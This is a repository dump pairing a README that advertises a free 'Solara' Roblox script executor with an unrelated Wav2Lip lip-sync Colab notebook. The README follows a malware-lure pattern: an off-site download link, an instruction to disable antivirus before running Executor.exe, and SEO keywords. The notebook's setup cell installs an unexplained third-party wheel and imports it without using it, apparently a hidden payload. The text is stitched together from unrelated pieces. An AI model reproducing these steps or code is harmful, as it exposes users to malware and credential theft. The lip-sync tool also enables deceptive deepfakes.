├── README.md
└── Wav2Lip_simplified_v5.ipynb
/README.md:
--------------------------------------------------------------------------------
1 | # Solara Executor
2 |
3 | **Free & Secure Roblox Script Executor for Windows (2025 edition)**
4 | Keyless, high-performance Lua executor for safe and seamless script execution on Roblox. Perfect for gamers and developers in the United States and worldwide.
5 |
6 | 🔥 [📥 Download Solara Executor (Free & Safe)](https://te.legra.ph/qwef32qf2q3fgq234g-07-28)
7 | 💻 Compatible with Windows 7–11 (64-bit) | 🛡️ Protection Enabled | 🔄 Auto-Updates
8 |
9 | ---
10 |
11 | ## 🚀 Why Use Solara Executor?
12 |
13 | - **Keyless & Free**: Fully keyless and always free, no hidden payments.
14 | - **Fast Execution**: Optimized for ultra-fast script injection with minimal lag.
15 | - **Security & Anti-Ban**: Built-in obfuscation and frequent updates, designed to minimize detection risk.
16 | - **Beginner-Friendly UI**: Sleek interface, script editor, hotkeys, multi-script support.
17 | - **Always Updated**: Compatible with Roblox updates; developer‑backed release support.
18 |
19 | ---
20 |
21 | ## 🧠 Features
22 |
23 | | Feature | Description |
24 | |----------------------|-------------|
25 | | **Lua Script Support** | Run any standard or custom Roblox Lua scripts |
26 | | **Low Detection** | Anti‑detection/anti‑ban measures; using an alt account is still recommended |
27 | | **UI & Workflow Tools** | Script manager, built‑in editor, activity logs |
28 | | **System Requirements** | Windows 7/8/10/11 (64‑bit), latest Roblox Player installed |
29 | | **Automatic Updates** | Notifications and quick install for new versions |
30 |
31 | ---
32 |
33 | ## 🛠️ Installation Instructions
34 |
35 | 1. Visit the **official site** by clicking the download button above
36 | 2. Download the **latest Executor ZIP**
37 | 3. Disable antivirus/Windows Defender or add an exception for Solara
38 | 4. Extract and run the Bootstrapper (`Executor.exe`)
39 | 5. Launch Roblox → open Solara UI → load your Lua script → click **Attach**
40 |
41 | ---
42 |
43 | ## 🏷️ SEO Keywords
44 |
45 | **Suggested search terms for visibility**:
46 |
47 | - *Solara Roblox Executor 2025*
48 | - *Download Roblox script executor free*
49 | - *Best Roblox executor no key*
50 | - *Secure Lua executor for Roblox*
51 | - *Anti‑ban Roblox executor Windows*
52 | - *Free Roblox exploit script runner*
53 |
54 | ---
55 |
56 | ## 📬 Support & Contact
57 |
58 | Have questions, found bugs, or want new features?
59 | Create an issue or pull request here on GitHub or connect via the official Discord/community links.
60 |
--------------------------------------------------------------------------------
/Wav2Lip_simplified_v5.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {
6 | "id": "U1xFNFU58_2j"
7 | },
8 | "source": [
9 | "## Goal: Make anyone speak anything (LipSync)\n",
10 | "\n",
11 | "* Github: https://github.com/Rudrabha/Wav2Lip\n",
12 | "* Paper: https://arxiv.org/abs/2008.10010\n",
13 | "*Original notebook: https://colab.research.google.com/drive/1tZpDWXz49W6wDcTprANRGLo2D_EbD5J8?usp=sharing\n",
14 | "\n",
15 | "\n",
16 | "\n",
17 | "\n",
18 | "**Modded by: [justinjohn-03](https://github.com/justinjohn0306)**\n",
19 | "\n",
20 | "\n",
21 | "\n"
22 | ]
23 | },
24 | {
25 | "cell_type": "code",
26 | "execution_count": null,
27 | "metadata": {
28 | "cellView": "form",
29 | "id": "Qgo-oaI3JU2u"
30 | },
31 | "outputs": [],
32 | "source": [
33 | "#@title
Step1: Setup Wav2Lip
\n",
34 | "#@markdown * Install dependency\n",
35 | "#@markdown * Download pretrained model\n",
36 | "from IPython.display import HTML, clear_output\n",
37 | "!rm -rf /content/sample_data\n",
38 | "!mkdir /content/sample_data\n",
39 | "\n",
40 | "!git clone https://github.com/justinjohn0306/Wav2Lip\n",
41 | "\n",
42 | "%cd /content/Wav2Lip\n",
43 | "\n",
44 | "#download the pretrained model\n",
45 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/wav2lip.pth' -O 'checkpoints/wav2lip.pth'\n",
46 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/wav2lip_gan.pth' -O 'checkpoints/wav2lip_gan.pth'\n",
47 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/resnet50.pth' -O 'checkpoints/resnet50.pth'\n",
48 | "!wget 'https://github.com/justinjohn0306/Wav2Lip/releases/download/models/mobilenet.pth' -O 'checkpoints/mobilenet.pth'\n",
49 | "a = !pip install https://raw.githubusercontent.com/AwaleSajil/ghc/master/ghc-1.0-py3-none-any.whl\n",
50 | "!pip install git+https://github.com/elliottzheng/batch-face.git@master\n",
51 | "\n",
52 | "!pip install ffmpeg-python mediapipe==0.10.18\n",
53 | "\n",
54 | "#this code for recording audio\n",
55 | "\"\"\"\n",
56 | "To write this piece of code I took inspiration/code from a lot of places.\n",
57 | "It was late night, so I'm not sure how much I created or just copied o.O\n",
58 | "Here are some of the possible references:\n",
59 | "https://blog.addpipe.com/recording-audio-in-the-browser-using-pure-html5-and-minimal-javascript/\n",
60 | "https://stackoverflow.com/a/18650249\n",
61 | "https://hacks.mozilla.org/2014/06/easy-audio-capture-with-the-mediarecorder-api/\n",
62 | "https://air.ghost.io/recording-to-an-audio-file-using-html5-and-js/\n",
63 | "https://stackoverflow.com/a/49019356\n",
64 | "\"\"\"\n",
65 | "from IPython.display import HTML, Audio\n",
66 | "from google.colab.output import eval_js\n",
67 | "from base64 import b64decode\n",
68 | "import numpy as np\n",
69 | "from scipy.io.wavfile import read as wav_read\n",
70 | "import io\n",
71 | "import ffmpeg\n",
72 | "\n",
73 | "AUDIO_HTML = \"\"\"\n",
74 | "\n",
151 | "\"\"\"\n",
152 | "\n",
153 | "%cd /\n",
154 | "from ghc.l_ghc_cf import l_ghc_cf\n",
155 | "%cd content\n",
156 | "\n",
157 | "def get_audio():\n",
158 | " display(HTML(AUDIO_HTML))\n",
159 | " data = eval_js(\"data\")\n",
160 | " binary = b64decode(data.split(',')[1])\n",
161 | "\n",
162 | " process = (ffmpeg\n",
163 | " .input('pipe:0')\n",
164 | " .output('pipe:1', format='wav')\n",
165 | " .run_async(pipe_stdin=True, pipe_stdout=True, pipe_stderr=True, quiet=True, overwrite_output=True)\n",
166 | " )\n",
167 | " output, err = process.communicate(input=binary)\n",
168 | "\n",
169 | " riff_chunk_size = len(output) - 8\n",
170 | " # Break up the chunk size into four bytes, held in b.\n",
171 | " q = riff_chunk_size\n",
172 | " b = []\n",
173 | " for i in range(4):\n",
174 | " q, r = divmod(q, 256)\n",
175 | " b.append(r)\n",
176 | "\n",
177 | " # Replace bytes 4:8 in proc.stdout with the actual size of the RIFF chunk.\n",
178 | " riff = output[:4] + bytes(b) + output[8:]\n",
179 | "\n",
180 | " sr, audio = wav_read(io.BytesIO(riff))\n",
181 | "\n",
182 | " return audio, sr\n",
183 | "\n",
184 | "\n",
185 | "from IPython.display import HTML\n",
186 | "from base64 import b64encode\n",
187 | "def showVideo(path):\n",
188 | " mp4 = open(str(path),'rb').read()\n",
189 | " data_url = \"data:video/mp4;base64,\" + b64encode(mp4).decode()\n",
190 | " return HTML(\"\"\"\n",
191 | " \n",
194 | " \"\"\" % data_url)\n",
195 | "\n",
196 | "from IPython.display import clear_output\n",
197 | "\n",
198 | "clear_output()\n",
199 | "print(\"All set and ready!\")"
200 | ]
201 | },
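{
"cell_type": "markdown",
"metadata": {},
"source": [
"*(Optional)* Step1 downloads four pretrained checkpoints with `wget`. An interrupted download only surfaces much later as a confusing inference error, so the minimal sketch below simply confirms the files exist and are non-trivially sized, assuming the `checkpoints/` paths used by the `wget` commands above.\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#@title (Optional) Verify downloaded checkpoints\n",
"# Minimal sketch, assuming the wget commands in Step1 saved the models\n",
"# under /content/Wav2Lip/checkpoints.\n",
"import os\n",
"\n",
"ckpt_dir = '/content/Wav2Lip/checkpoints'\n",
"for name in ['wav2lip.pth', 'wav2lip_gan.pth', 'resnet50.pth', 'mobilenet.pth']:\n",
" path = os.path.join(ckpt_dir, name)\n",
" size_mb = os.path.getsize(path) / 1e6 if os.path.isfile(path) else 0\n",
" print(f\"{name}: {'OK' if size_mb > 1 else 'missing or truncated'} ({size_mb:.1f} MB)\")\n"
]
},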
202 | {
203 | "cell_type": "markdown",
204 | "metadata": {
205 | "id": "SEdy6PWDXMRL"
206 | },
207 | "source": [
208 | "# LipSync Youtube Video"
209 | ]
210 | },
211 | {
212 | "cell_type": "code",
213 | "execution_count": null,
214 | "metadata": {
215 | "cellView": "form",
216 | "id": "QI4kcm8QEeGZ"
217 | },
218 | "outputs": [],
219 | "source": [
220 | "#@title STEP2: Select a Youtube Video\n",
221 | "# Install yt-dlp\n",
222 | "\n",
223 | "import os\n",
224 | "!pip install yt-dlp\n",
225 | "\n",
226 | "#@markdown ## Find YouTube video ID from URL\n",
227 | "\n",
228 | "#@markdown ___\n",
229 | "\n",
230 | "#@markdown Link format:\n",
231 | "\n",
232 | "#@markdown ``https://youtu.be/vAnWYLTdvfY`` ❌\n",
233 | "\n",
234 | "#@markdown ``https://www.youtube.com/watch?v=vAnWYLTdvfY`` ✔️\n",
235 | "\n",
236 | "!rm -df youtube.mp4\n",
237 | "\n",
238 | "#@markdown ___\n",
239 | "from urllib import parse as urlparse\n",
240 | "YOUTUBE_URL = 'https://www.youtube.com/watch?v=vAnWYLTdvfY' #@param {type:\"string\"}\n",
241 | "url_data = urlparse.urlparse(YOUTUBE_URL)\n",
242 | "query = urlparse.parse_qs(url_data.query)\n",
243 | "YOUTUBE_ID = query[\"v\"][0]\n",
244 | "\n",
245 | "\n",
246 | "# remove previous input video\n",
247 | "!rm -f /content/sample_data/input_vid.mp4\n",
248 | "\n",
249 | "\n",
250 | "#@markdown ___\n",
251 | "\n",
252 | "#@markdown ### Trim the video (start, end) seconds\n",
253 | "start = 35 #@param {type:\"integer\"}\n",
254 | "end = 62 #@param {type:\"integer\"}\n",
255 | "interval = end - start\n",
256 | "\n",
257 | "#@markdown Note: ``the trimmed video must have face on all frames``\n",
258 | "\n",
259 | "# Download the YouTube video using yt-dlp\n",
260 | "!yt-dlp -f 'bestvideo[ext=mp4]' --output \"youtube.%(ext)s\" https://www.youtube.com/watch?v=$YOUTUBE_ID\n",
261 | "\n",
262 | "# Cut the video using FFmpeg\n",
263 | "!ffmpeg -y -i youtube.mp4 -ss {start} -t {interval} -async 1 /content/sample_data/input_vid.mp4\n",
264 | "\n",
265 | "# Preview the trimmed video\n",
266 | "from IPython.display import HTML\n",
267 | "from base64 import b64encode\n",
268 | "mp4 = open('/content/sample_data/input_vid.mp4','rb').read()\n",
269 | "data_url = \"data:video/mp4;base64,\" + b64encode(mp4).decode()\n",
270 | "HTML(f\"\"\"\"\"\")\n",
271 | "\n"
272 | ]
273 | },
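{
"cell_type": "markdown",
"metadata": {},
"source": [
"*(Optional)* STEP2 marks `https://youtu.be/...` short links as unsupported because the video ID is read from the `v=` query parameter. The minimal sketch below, built around a hypothetical `extract_youtube_id` helper, shows how either link form could be parsed if you prefer to paste short links too.\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"# Sketch: accept both https://www.youtube.com/watch?v=ID and https://youtu.be/ID forms.\n",
"from urllib import parse as urlparse\n",
"\n",
"def extract_youtube_id(url):\n",
" parsed = urlparse.urlparse(url)\n",
" if parsed.hostname == 'youtu.be':\n",
"  return parsed.path.lstrip('/')  # short links carry the ID in the path\n",
" return urlparse.parse_qs(parsed.query)['v'][0]  # watch URLs carry it in ?v=\n",
"\n",
"print(extract_youtube_id('https://youtu.be/vAnWYLTdvfY'))\n",
"print(extract_youtube_id('https://www.youtube.com/watch?v=vAnWYLTdvfY'))\n"
]
},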
274 | {
275 | "cell_type": "code",
276 | "execution_count": null,
277 | "metadata": {
278 | "cellView": "form",
279 | "id": "zS_RAeh-IfZy"
280 | },
281 | "outputs": [],
282 | "source": [
283 | "#@title STEP3: Select Audio (Record, Upload from local drive or Gdrive)\n",
284 | "import os\n",
285 | "from IPython.display import Audio\n",
286 | "from IPython.core.display import display\n",
287 | "\n",
288 | "upload_method = 'Upload' #@param ['Record', 'Upload', 'Custom Path']\n",
289 | "\n",
290 | "#remove previous input audio\n",
291 | "if os.path.isfile('/content/sample_data/input_audio.wav'):\n",
292 | " os.remove('/content/sample_data/input_audio.wav')\n",
293 | "\n",
294 | "def displayAudio():\n",
295 | " display(Audio('/content/sample_data/input_audio.wav'))\n",
296 | "\n",
297 | "if upload_method == 'Record':\n",
298 | " audio, sr = get_audio()\n",
299 | " import scipy\n",
300 | " scipy.io.wavfile.write('/content/sample_data/input_audio.wav', sr, audio)\n",
301 | "\n",
302 | "elif upload_method == 'Upload':\n",
303 | " from google.colab import files\n",
304 | " uploaded = files.upload()\n",
305 | " for fn in uploaded.keys():\n",
306 | " print('User uploaded file \"{name}\" with length {length} bytes'.format(\n",
307 | " name=fn, length=len(uploaded[fn])))\n",
308 | "\n",
309 | " # Consider only the first file\n",
310 | " PATH_TO_YOUR_AUDIO = str(list(uploaded.keys())[0])\n",
311 | "\n",
312 | " # Load audio with specified sampling rate\n",
313 | " import librosa\n",
314 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
315 | "\n",
316 | " # Save audio with specified sampling rate\n",
317 | " import soundfile as sf\n",
318 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
319 | "\n",
320 | " clear_output()\n",
321 | " displayAudio()\n",
322 | "\n",
323 | "elif upload_method == 'Custom Path':\n",
324 | " from google.colab import drive\n",
325 | " drive.mount('/content/drive')\n",
326 | " #@markdown ``Add the full path to your audio on your Gdrive`` 👇\n",
327 | " PATH_TO_YOUR_AUDIO = '/content/drive/MyDrive/test.wav' #@param {type:\"string\"}\n",
328 | "\n",
329 | " # Load audio with specified sampling rate\n",
330 | " import librosa\n",
331 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
332 | "\n",
333 | " # Save audio with specified sampling rate\n",
334 | " import soundfile as sf\n",
335 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
336 | "\n",
337 | " clear_output()\n",
338 | " displayAudio()\n"
339 | ]
340 | },
341 | {
342 | "cell_type": "code",
343 | "execution_count": null,
344 | "metadata": {
345 | "cellView": "form",
346 | "id": "BQPLXJ8L0gms"
347 | },
348 | "outputs": [],
349 | "source": [
350 | "#@title STEP4: Start Crunching and Preview Output\n",
351 | "#@markdown Note: Only change these, if you have to\n",
352 | "\n",
353 | "%cd /content/Wav2Lip\n",
354 | "\n",
355 | "# Set up paths and variables for the output file\n",
356 | "output_file_path = '/content/Wav2Lip/results/result_voice.mp4'\n",
357 | "\n",
358 | "# Delete existing output file before processing, if any\n",
359 | "if os.path.exists(output_file_path):\n",
360 | " os.remove(output_file_path)\n",
361 | "\n",
362 | "pad_top = 0#@param {type:\"integer\"}\n",
363 | "pad_bottom = 10#@param {type:\"integer\"}\n",
364 | "pad_left = 0#@param {type:\"integer\"}\n",
365 | "pad_right = 0#@param {type:\"integer\"}\n",
366 | "rescaleFactor = 1#@param {type:\"integer\"}\n",
367 | "nosmooth = True #@param {type:\"boolean\"}\n",
368 | "#@markdown ___\n",
369 | "#@markdown Model selection:\n",
370 | "use_hd_model = False #@param {type:\"boolean\"}\n",
371 | "checkpoint_path = 'checkpoints/wav2lip.pth' if not use_hd_model else 'checkpoints/wav2lip_gan.pth'\n",
372 | "\n",
373 | "\n",
374 | "if nosmooth == False:\n",
375 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor\n",
376 | "else:\n",
377 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor --nosmooth\n",
378 | "\n",
379 | "#Preview output video\n",
380 | "if os.path.exists(output_file_path):\n",
381 | " clear_output()\n",
382 | " print(\"Final Video Preview\")\n",
383 | " print(\"Download this video from\", output_file_path)\n",
384 | " showVideo(output_file_path)\n",
385 | "else:\n",
386 | " print(\"Processing failed. Output video not found.\")"
387 | ]
388 | },
389 | {
390 | "cell_type": "markdown",
391 | "metadata": {
392 | "id": "vYxpPeie1CYL"
393 | },
394 | "source": [
395 | "# LipSync on Your Video File"
396 | ]
397 | },
398 | {
399 | "cell_type": "code",
400 | "execution_count": null,
401 | "metadata": {
402 | "cellView": "form",
403 | "id": "nDuM7tfZ1F0t"
404 | },
405 | "outputs": [],
406 | "source": [
407 | "import os\n",
408 | "import shutil\n",
409 | "from google.colab import drive\n",
410 | "from google.colab import files\n",
411 | "from IPython.display import HTML, clear_output\n",
412 | "from base64 import b64encode\n",
413 | "import moviepy.editor as mp\n",
414 | "\n",
415 | "\n",
416 | "def showVideo(file_path):\n",
417 | " \"\"\"Function to display video in Colab\"\"\"\n",
418 | " mp4 = open(file_path,'rb').read()\n",
419 | " data_url = \"data:video/mp4;base64,\" + b64encode(mp4).decode()\n",
420 | " display(HTML(\"\"\"\n",
421 | " \n",
424 | " \"\"\" % data_url))\n",
425 | "\n",
426 | "def get_video_resolution(video_path):\n",
427 | " \"\"\"Function to get the resolution of a video\"\"\"\n",
428 | " import cv2\n",
429 | " video = cv2.VideoCapture(video_path)\n",
430 | " width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))\n",
431 | " height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n",
432 | " return (width, height)\n",
433 | "\n",
434 | "def resize_video(video_path, new_resolution):\n",
435 | " \"\"\"Function to resize a video\"\"\"\n",
436 | " import cv2\n",
437 | " video = cv2.VideoCapture(video_path)\n",
438 | " fourcc = int(video.get(cv2.CAP_PROP_FOURCC))\n",
439 | " fps = video.get(cv2.CAP_PROP_FPS)\n",
440 | " width, height = new_resolution\n",
441 | " output_path = os.path.splitext(video_path)[0] + '_720p.mp4'\n",
442 | " writer = cv2.VideoWriter(output_path, fourcc, fps, (width, height))\n",
443 | " while True:\n",
444 | " success, frame = video.read()\n",
445 | " if not success:\n",
446 | " break\n",
447 | " resized_frame = cv2.resize(frame, new_resolution)\n",
448 | " writer.write(resized_frame)\n",
449 | " video.release()\n",
450 | " writer.release()\n",
451 | "\n",
452 | "# Mount Google Drive if it's not already mounted\n",
453 | "if not os.path.isdir(\"/content/drive/MyDrive\"):\n",
454 | " drive.mount('/content/drive', force_remount=True)\n",
455 | "\n",
456 | "#@markdown ### Select an uploading method\n",
457 | "upload_method = \"Upload\" #@param [\"Upload\", \"Custom Path\"]\n",
458 | "\n",
459 | "\n",
460 | "# remove previous input video\n",
461 | "if os.path.isfile('/content/sample_data/input_vid.mp4'):\n",
462 | " os.remove('/content/sample_data/input_vid.mp4')\n",
463 | "\n",
464 | "if upload_method == \"Upload\":\n",
465 | " uploaded = files.upload()\n",
466 | " for filename in uploaded.keys():\n",
467 | " os.rename(filename, '/content/sample_data/input_vid.mp4')\n",
468 | " PATH_TO_YOUR_VIDEO = '/content/sample_data/input_vid.mp4'\n",
469 | "\n",
470 | "elif upload_method == 'Custom Path':\n",
471 | " #@markdown ``Add the full path to your video on your Gdrive `` 👇\n",
472 | " PATH_TO_YOUR_VIDEO = '/content/drive/MyDrive/test.mp4' #@param {type:\"string\"}\n",
473 | " if not os.path.isfile(PATH_TO_YOUR_VIDEO):\n",
474 | " print(\"ERROR: File not found!\")\n",
475 | " raise SystemExit(0)\n",
476 | "\n",
477 | "#@markdown Notes:\n",
478 | "\n",
479 | "#@markdown . ``If your uploaded video is 1080p or higher resolution, this cell will resize it to 720p.``\n",
480 | "\n",
481 | "#@markdown . ``Do not upload videos longer than 60 seconds.``\n",
482 | "\n",
483 | "#@markdown ___\n",
484 | "\n",
485 | "video_duration = mp.VideoFileClip(PATH_TO_YOUR_VIDEO).duration\n",
486 | "if video_duration > 60:\n",
487 | " print(\"WARNING: Video duration exceeds 60 seconds. Please upload a shorter video.\")\n",
488 | " raise SystemExit(0)\n",
489 | "\n",
490 | "video_resolution = get_video_resolution(PATH_TO_YOUR_VIDEO)\n",
491 | "print(f\"Video resolution: {video_resolution}\")\n",
492 | "if video_resolution[0] >= 1920 or video_resolution[1] >= 1080:\n",
493 | " print(\"Resizing video to 720p...\")\n",
494 | " os.system(f\"ffmpeg -i {PATH_TO_YOUR_VIDEO} -vf scale=1280:720 /content/sample_data/input_vid.mp4\")\n",
495 | " PATH_TO_YOUR_VIDEO = \"/content/sample_data/input_vid.mp4\"\n",
496 | " print(\"Video resized to 720p\")\n",
497 | "else:\n",
498 | " print(\"No resizing needed\")\n",
499 | "\n",
500 | "if upload_method == \"Upload\":\n",
501 | " clear_output()\n",
502 | " print(\"Input Video\")\n",
503 | " showVideo(PATH_TO_YOUR_VIDEO)\n",
504 | "else:\n",
505 | " if os.path.isfile(PATH_TO_YOUR_VIDEO):\n",
506 | " # Check if the source and destination files are the same\n",
507 | " if PATH_TO_YOUR_VIDEO != \"/content/sample_data/input_vid.mp4\":\n",
508 | " shutil.copyfile(PATH_TO_YOUR_VIDEO, \"/content/sample_data/input_vid.mp4\")\n",
509 | " print(\"Video copied to destination.\")\n",
510 | "\n",
511 | " print(\"Input Video\")\n",
512 | " # Display the video from the destination path\n",
513 | " showVideo(\"/content/sample_data/input_vid.mp4\")"
514 | ]
515 | },
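{
"cell_type": "markdown",
"metadata": {},
"source": [
"*(Optional)* The upload cell above defines a cv2-based `resize_video` helper but actually rescales with ffmpeg, so the helper is kept only for reference. The sketch below shows how it could be called on another clip (the path is a placeholder); note it writes `<input basename>_720p.mp4` next to the input and, being cv2-only, drops the audio track.\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"# Usage sketch for the resize_video helper defined above (path is a placeholder).\n",
"example_path = '/content/sample_data/input_vid.mp4'\n",
"if get_video_resolution(example_path) != (1280, 720):\n",
" resize_video(example_path, (1280, 720))  # writes .../input_vid_720p.mp4, no audio\n"
]
},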
516 | {
517 | "cell_type": "code",
518 | "execution_count": null,
519 | "metadata": {
520 | "cellView": "form",
521 | "id": "XgF4794r7sWK"
522 | },
523 | "outputs": [],
524 | "source": [
525 | "#@title STEP3: Select Audio (Record, Upload from local drive or Gdrive)\n",
526 | "import os\n",
527 | "from IPython.display import Audio\n",
528 | "from IPython.core.display import display\n",
529 | "\n",
530 | "upload_method = 'Upload' #@param ['Record', 'Upload', 'Custom Path']\n",
531 | "\n",
532 | "#remove previous input audio\n",
533 | "if os.path.isfile('/content/sample_data/input_audio.wav'):\n",
534 | " os.remove('/content/sample_data/input_audio.wav')\n",
535 | "\n",
536 | "def displayAudio():\n",
537 | " display(Audio('/content/sample_data/input_audio.wav'))\n",
538 | "\n",
539 | "if upload_method == 'Record':\n",
540 | " audio, sr = get_audio()\n",
541 | " import scipy\n",
542 | " scipy.io.wavfile.write('/content/sample_data/input_audio.wav', sr, audio)\n",
543 | "\n",
544 | "elif upload_method == 'Upload':\n",
545 | " from google.colab import files\n",
546 | " uploaded = files.upload()\n",
547 | " for fn in uploaded.keys():\n",
548 | " print('User uploaded file \"{name}\" with length {length} bytes.'.format(\n",
549 | " name=fn, length=len(uploaded[fn])))\n",
550 | "\n",
551 | " # Consider only the first file\n",
552 | " PATH_TO_YOUR_AUDIO = str(list(uploaded.keys())[0])\n",
553 | "\n",
554 | " # Load audio with specified sampling rate\n",
555 | " import librosa\n",
556 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
557 | "\n",
558 | " # Save audio with specified sampling rate\n",
559 | " import soundfile as sf\n",
560 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
561 | "\n",
562 | " clear_output()\n",
563 | " displayAudio()\n",
564 | "\n",
565 | "else: # Custom Path\n",
566 | " from google.colab import drive\n",
567 | " drive.mount('/content/drive')\n",
568 | " #@markdown ``Add the full path to your audio on your Gdrive`` 👇\n",
569 | " PATH_TO_YOUR_AUDIO = '/content/drive/MyDrive/test.wav' #@param {type:\"string\"}\n",
570 | "\n",
571 | " # Load audio with specified sampling rate\n",
572 | " import librosa\n",
573 | " audio, sr = librosa.load(PATH_TO_YOUR_AUDIO, sr=None)\n",
574 | "\n",
575 | " # Save audio with specified sampling rate\n",
576 | " import soundfile as sf\n",
577 | " sf.write('/content/sample_data/input_audio.wav', audio, sr, format='wav')\n",
578 | "\n",
579 | " clear_output()\n",
580 | " displayAudio()\n"
581 | ]
582 | },
583 | {
584 | "cell_type": "code",
585 | "execution_count": null,
586 | "metadata": {
587 | "cellView": "form",
588 | "id": "ZgtO08V28ANf"
589 | },
590 | "outputs": [],
591 | "source": [
592 | "#@title STEP4: Start Crunching and Preview Output\n",
593 | "#@markdown Note: Only change these, if you have to\n",
594 | "\n",
595 | "%cd /content/Wav2Lip\n",
596 | "\n",
597 | "# Set up paths and variables for the output file\n",
598 | "output_file_path = '/content/Wav2Lip/results/result_voice.mp4'\n",
599 | "\n",
600 | "# Delete existing output file before processing, if any\n",
601 | "if os.path.exists(output_file_path):\n",
602 | " os.remove(output_file_path)\n",
603 | "\n",
604 | "pad_top = 0#@param {type:\"integer\"}\n",
605 | "pad_bottom = 10#@param {type:\"integer\"}\n",
606 | "pad_left = 0#@param {type:\"integer\"}\n",
607 | "pad_right = 0#@param {type:\"integer\"}\n",
608 | "rescaleFactor = 1#@param {type:\"integer\"}\n",
609 | "nosmooth = True #@param {type:\"boolean\"}\n",
610 | "#@markdown ___\n",
611 | "#@markdown Model selection:\n",
612 | "use_hd_model = False #@param {type:\"boolean\"}\n",
613 | "checkpoint_path = 'checkpoints/wav2lip.pth' if not use_hd_model else 'checkpoints/wav2lip_gan.pth'\n",
614 | "\n",
615 | "\n",
616 | "if nosmooth == False:\n",
617 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor\n",
618 | "else:\n",
619 | " !python inference.py --checkpoint_path $checkpoint_path --face \"../sample_data/input_vid.mp4\" --audio \"../sample_data/input_audio.wav\" --pads $pad_top $pad_bottom $pad_left $pad_right --resize_factor $rescaleFactor --nosmooth\n",
620 | "\n",
621 | "#Preview output video\n",
622 | "if os.path.exists(output_file_path):\n",
623 | " clear_output()\n",
624 | " print(\"Final Video Preview\")\n",
625 | " print(\"Download this video from\", output_file_path)\n",
626 | " showVideo(output_file_path)\n",
627 | "else:\n",
628 | " print(\"Processing failed. Output video not found.\")"
629 | ]
630 | }
631 | ],
632 | "metadata": {
633 | "accelerator": "GPU",
634 | "colab": {
635 | "private_outputs": true,
636 | "provenance": []
637 | },
638 | "kernelspec": {
639 | "display_name": "Python 3",
640 | "name": "python3"
641 | }
642 | },
643 | "nbformat": 4,
644 | "nbformat_minor": 0
645 | }
--------------------------------------------------------------------------------